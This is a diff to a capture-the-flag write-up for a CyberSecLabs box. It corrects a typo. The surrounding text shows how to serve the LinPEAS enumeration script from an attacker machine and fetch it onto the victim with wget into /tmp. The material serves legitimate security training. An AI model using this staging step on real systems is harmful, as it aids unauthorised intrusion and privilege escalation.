Cyb3rR3ap3r/cyb3rr3ap3r.github.io/posts/ctf/cyberseclabs/shock.md

 ![image](https://user-images.githubusercontent.com/50459517/102672947-e717f800-4157-11eb-89d5-aa3c19b5d8e5.png)

-With that out of the way, I normally like to run some type of post-enumeration script line LinPEAS.
+With that out of the way, I normally like to run some type of post-enumeration script like LinPEAS.
 We can just host up the file with **python -m SimpleHTTPServer 80** on our machine and then **wget http://ip/linpeas.sh** onto the victim machine in a directory we have rwx permissions in (i.e. /tmp)

 ![image](https://user-images.githubusercontent.com/50459517/102673038-2d6d5700-4158-11eb-9eb9-a0523ab69804.png)